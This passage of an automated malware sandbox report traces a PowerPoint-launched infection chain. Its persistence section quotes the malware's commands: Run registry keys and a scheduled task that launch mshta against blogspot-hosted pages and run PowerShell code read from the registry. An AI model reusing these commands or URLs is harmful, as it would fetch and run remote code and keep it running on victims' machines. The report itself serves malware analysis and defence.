              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF5DA4 push eax; retn 0074h
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF5557 push ebp; iretd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF5554 push ebp; iretd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF5578 push eax; retn 0074h
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF6908 push eax; retn 0074h
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF2C9C push eax; retn 0074h
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF5098 push eax; retn 0074h
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF58B0 push eax; retn 0074h
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF6868 push edi; iretd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF5077 push eax; iretd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF5075 push eax; iretd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF43E8 push edi; iretd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF43E8 push edi; iretd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF43E0 push edi; iretd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF4388 push edi; iretd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF4F91 push eax; iretd
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF4FB0 push eax; retn 0074h
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 33_2_01CF5354 push eax; retn 0074h

              Boot Survival:

              barindex
              Creates an autostart registry key pointing to binary in C:\WindowsShow sources
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebabyJump to behavior
              Creates autostart registry keys with suspicious values (likely registry only malware)Show sources
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mithuiki mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).meather)|IEX"", 0 : window.close")Jump to behavior
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebaby mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://backbones1234511a.blogspot.com/p/stback1.html"", 0 : window.close")Jump to behavior
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULL mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://startthepartyup.blogspot.com/p/backbone14.html"", 0 : window.close")Jump to behavior
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bukun mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta https://ghostbackbone123.blogspot.com/p/ghostbackup13.html"", 0 : window.close")Jump to behavior
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Defeduckgotfucked mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).phuttalylo)|IEX"", 0 : window.close")Jump to behavior
              Creates multiple autostart registry keysShow sources
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bukunJump to behavior
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run DefeduckgotfuckedJump to behavior
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mithuikiJump to behavior
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebabyJump to behavior
              Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
              Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''lunkicharkhi'' /F /tr ''\''mshta\''vbscript:Execute('\'CreateObject(''\''Wscript.Shell''\'').Run ''\''mshta https://randikhanaekminar.blogspot.com/p/st2.html''\'', 0 : window.close'\')
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mithuikiJump to behavior
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mithuikiJump to behavior
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebabyJump to behavior
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run checkmatebabyJump to behavior
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bukunJump to behavior
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run bukunJump to behavior
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run DefeduckgotfuckedJump to behavior
              Source: C:\Windows\System32\mshta.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run DefeduckgotfuckedJump to behavior
              Source: C:\Windows\System32\mshta.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
